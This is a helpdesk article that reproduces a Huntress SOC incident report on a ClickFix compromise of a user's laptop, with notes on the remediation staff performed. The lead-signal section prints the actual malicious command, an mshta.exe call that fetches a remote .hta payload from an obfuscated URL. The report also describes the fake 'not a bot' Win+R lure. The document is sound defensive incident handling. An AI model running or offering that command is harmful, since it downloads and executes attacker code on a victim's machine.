Recent Searches

No recent searches

    Popular Articles

      Articles
      View all
        Topics
        View all
          Tickets
          View all
            no results

            Sorry! nothing found for

            Abigail Tick - Laptop - visited compromised website

            Modified on Tue, 6 Jan at 5:00 PM 

            *** The Huntress Agent has been tasked to isolate this host from the rest of the network in order to prevent the incident from spreading to other hosts. ***

If you have an urgent request for support, please go to the link below to place a request a callback from SOC Support.
https://pachyderm-consulting.huntress.io/org/351441/infection_reports/1870623/soc_callback_requests/new

Host: OSI-JZK5RW3 - https://pachyderm-consulting.huntress.io/org/351441/agents/9704946
Organization: Open Space Institute
Tags: None
Security Products: Windows Defender

Incident Report: https://pachyderm-consulting.huntress.io/org/351441/infection_reports/1870623
Severity: Critical

Investigative Summary:
----------------------
At "2026-01-06 20:09:00 UTC", Huntress detected a malicious PowerShell-based command execution associated with the "ClickFix" malware family on the endpoint “OSI-JZK5RW3". This threat is typically distributed through phishing emails, fake software installers, or malicious scripts hosted on compromised or spoofed websites. ClickFix-style payloads are known for leveraging PowerShell to download and execute payloads directly in memory or from user-writable directories, such as "%AppData%", often bypassing anti-malware solutions. In this instance, the user "ATick / S-1-12-1-786345730-1325561484-1256424330-3927943348" executed a malicious PowerShell command via the Windows+R "Run Prompt".

In this instance, the user "ATick" visited a domain compromised with the ClickFix Ad, which prompted the user to press Win+R and enter a command to "Prove they are not a bot." Unfortunately, the end user ran the command, allowing the malicious process to execute in memory. This activity indicates a confirmed, multi-stage, in-memory compromise of the host, meaning the attacker successfully bypassed initial defenses and established a presence on the host.

Huntress has isolated the endpoint, and we recommend conducting a thorough review to identify additional IOCs, remove any unauthorized or suspicious software, validate persistence mechanisms, and rotate credentials for all users who may have been exposed. Network activity from the endpoint should be carefully reviewed for evidence of command-and-control traffic, data exfiltration, or lateral movement. Where complete confidence in remediation can't be established, a wipe-and-rebuild of the affected system may be necessary to ensure complete removal.

IOCs typically include:
- Script execution via encoded PowerShell blocks
- Potential harvesting of stored user credentials
- Executable payloads in AppData\Roaming subfolders
- Registry-based persistence via Run and RunOnce keys

Threat Descriptions:
--------------------
Malicious Downloader / Malicious Download: Malicious activity has resulted in the download and execution of an additional malicious payload(s). 

Remediations:
-------------
Assisted Remediations provided by the Huntress SOC to remediate the incident. These can be executed automatically in the Huntress Platform:
- Reboot the Host - remediation: A reboot is required to complete the remediation plan + name:  + parameters: 

Manual Remediations provided by the Huntress SOC are highly recommended remediation actions to be conducted by your team before resolving the incident in the Huntress Platform:
- Investigate for Lateral Movement or Data Exfiltration Attempts.
- Audit affected directories/files for additional suspicious files and remove those found.
- Invalidate any cached or saved credentials, including VPN, email, and other internal systems.
- Immediately reset the credentials for the affected user account and force a logout across all active sessions.
- Consider re-imaging this host or restoring from a known-good baseline to ensure total remediation of this security incident.
- Enroll the user in a security awareness training session focused on phishing, malware, and social engineering tactics to prevent future threats.

All remediations provided can be found in the Huntress Platform: Incident Report: https://pachyderm-consulting.huntress.io/org/351441/infection_reports/1870623#remediations-tab

Lead Signal Information:
------------------------
Signal Name: MS Hta Downloading Remote Payload
Detected At: 2026-01-06 20:08:00 UTC
Start Time: 2026-01-06 20:06:53 UTC
Command: "C:\WINDOWS\system32\mshta.exe" https://%66%72%6F%73%74%79%2D%6D%6F%75%73%65%2D%63%32%64%62%2E%6E%61%73%69%70%69%37%34%30%39%2E%77%6F%72%6B%65%72%73%2E%64%65%76/verify.hta
Executable: C:\WINDOWS\system32\mshta.exe
Process ID: 2efcbf64-eb27-11f0-9417-1091d145a4d8
Parent Process: C:\WINDOWS\Explorer.EXE
User: ATick

All investigated signals can be found in the Huntress Platform: https://pachyderm-consulting.huntress.io/org/351441/infection_reports/1870623#signals-investigated-tab

-------------------------
Thanks again for trusting Huntress and please don't hesitate to reach out to incidents@huntress.io if you have any questions.
             



            Followed all remediation steps.


            Lucio - Immediately changed password and logged out of all active sessions from admin portal 

            Steve ran a full system scan after the remediation steps were taken.

            Lucio deleted all saved credentials on the credential manager.

            Was this article helpful?

            That’s Great!

            Thank you for your feedback

            Sorry! We couldn't be helpful

            Thank you for your feedback

            Let us know how can we improve this article!

            Select at least one of the reasons
            CAPTCHA verification is required.

            Feedback sent

            We appreciate your effort and will try to fix the article

            Preview
            0 of 0